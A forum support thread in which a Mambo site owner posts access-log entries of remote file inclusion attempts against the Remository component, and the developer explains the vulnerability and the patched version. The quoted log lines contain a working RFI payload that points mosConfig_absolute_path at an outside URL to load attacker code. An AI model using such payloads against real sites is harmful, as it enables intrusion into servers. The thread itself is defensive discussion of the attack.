Home arrow Forum

Remository Forum

 


Boardwalk :: Forum List Remository Support Remository older versions
hwang

Karma: 0  
hack attemps? - 2008/11/10 08:18 Hello,
I found this in my log file:
alt255-05.isp-services.nl - - [08/Nov/2008:18:12:36 -0600] "GET /my_folder/index.php?option=com_r%20.../administrator/components/com_remository/ admin.remository.php?mosConfig_absolute_path=http://www.damnedsite.com.ar/ide.txt??? HTTP/1.1" 200 6271 "-" "libwww-perl/5.803"
alt255-05.isp-services.nl - - [08/Nov/2008:18:12:42 -0600] "GET /my_folder/index.php?option=com_r%20.../administrator/components/com_remository/ admin.remository.php?mosConfig_absolute_path=http://www.damnedsite.com.ar/ide.txt??? HTTP/1.1" 200 6271 "-" "libwww-perl/5.803"
222.233.52.18 - - [08/Nov/2008:18:13:16 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http:// www.damnedsite.com.ar/ide.txt??? HTTP/1.1" 404 1832 "-" "libwww-perl/5.79"
222.233.52.18 - - [08/Nov/2008:18:13:16 -0600] "GET /my_folder/administrator/components/com_remository/admin.remository.php? mosConfig_absolute_path=http://www.damnedsite.com.ar/ide.txt??? HTTP/1.1" 401 1802 "-" "libwww-perl/5.79"

I guess they got 401 and 404 accessing administrator folder because this folder is password protected, but I see they could get 200 in the first 2 lines.

Is this an attemp through remository? I'm using Mambo 4.5.6 and Remository 4.26. As Mambo 4.5.6 is still a secured version I'm not planning to move to 4.6.x. Which version of Remository that is secured and compatible with M4.5.6 should I upgrade to?

Thank you!
  | | Sorry, you do not currently have permission to write here.
admin

Karma: 98  
Re:hack attemps? - 2008/11/10 09:27 Yes, that's a hack attack, based on a vulnerability that unfortunately existed in some Remository versions prior to 3.26. Not all earlier versions are vulnerable, and 3.26 or any later version will not be affected by that attack. There have been no other known vulnerabilities in Remository. Martin Brampton aka Counterpoint
http://aliro.org
http://black-sheep-research.com
  | | Sorry, you do not currently have permission to write here.
hwang

Karma: 0  
Re:hack attemps? - 2008/11/11 01:31 Sorry, there was a typo in my post.
I'm using Remository 3.26, not 4.26.

Am I safe with 3.26 or do I have to upgrade? And which version should I upgrade to (to live well with Mambo 456)?

Thanks for your advice.

Edit: I found something weird:
I'm sure I upgraded to 3.26 a long time ago.
But From the frontend it says "Remository 3.25. is technology by Black Sheep Research"
From the backend:
- About Remository: version: 3.24
- From Component installer screen of Mambo: 3.26

I guess it's a matter of text? it's actually 3.26? In remository_install.xml it says 3.26.

Post edited by: hwang, at: 2008/11/11 03:29
  | | Sorry, you do not currently have permission to write here.
admin

Karma: 98  
Re:hack attemps? - 2008/11/11 18:06 Remository 3.26 was issued specifically to solve the problem of a vulnerability. The visible version number was left unchanged to avoid giving information to hackers, although this is probably not useful as the hackers seem to be trawling the web indiscriminately. The "about" should have been updated, that was a mistake. The latest versions of Remository have a simpler mechanism for amending the number that is then effective throughout the program, except that the packaging has to be changed separately. Martin Brampton aka Counterpoint
http://aliro.org
http://black-sheep-research.com
  | | Sorry, you do not currently have permission to write here.
Boardwalk :: Forum List Remository Support Remository older versions

Aliroboard Forum Component 1.2
Aliro Software

Menu

Advice Notes

Login

Subscribe to Premium Support

Get priority support for Remository and Glossary, sign up now for a Premium Support monthly subscription:

Your Remository user name

Or purchase a year's support:

Your Remository user name

Recommended SEF

SEF Advance

Who is Online

Remository welcomes guests and visitors

We have 10 guest online